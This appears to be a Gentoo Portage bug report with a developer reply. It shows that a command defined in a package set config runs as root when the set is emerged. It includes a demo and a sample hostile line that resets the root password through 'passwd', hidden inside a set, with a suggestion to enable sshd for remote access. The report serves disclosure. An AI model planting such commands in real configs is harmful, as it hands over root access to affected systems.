----------------------------------------------------------------------------- Nord night # cat /usr/local/portage/sets.conf [suicide] class = portage.sets.shell.CommandOutputSet command = echo -e "$(eix -I --only-names)\n$(emerge --list-sets | grep -v '^(*.glsa.*|downgrade|unavailible|module-rebuild)$'| sed 's/^\s*/@/')" [test] class = portage.sets.shell.CommandOutputSet command = echo $(whoami > /var/lib/portage/test) Nord night # emerge @test emerge: 'test' is an empty set emerge: no targets left after set expansion Nord night # cat /var/lib/portage/test nightr ------------------------------------------------------------------------- (nightr - aliased root user with uid 0). This is simple example, but such string may be hidden in any real set, just like that 'command = echo -e "$(echo -e "abc123\nabc123" | passwd root)\n$(<real command>)" Reproducible: Always Steps to Reproduce: 1. make set like above. 2. emerge @<set_name> 3. Don't forget to turn on sshd and told what password you've assigned into set =)
Any ebuild within the overlay can execute code with root privileges outside the sandbox anyway. What's the point of protecting against attacks via malicious sets? You must trust the owner of a repository when adding it to your list of overlays.
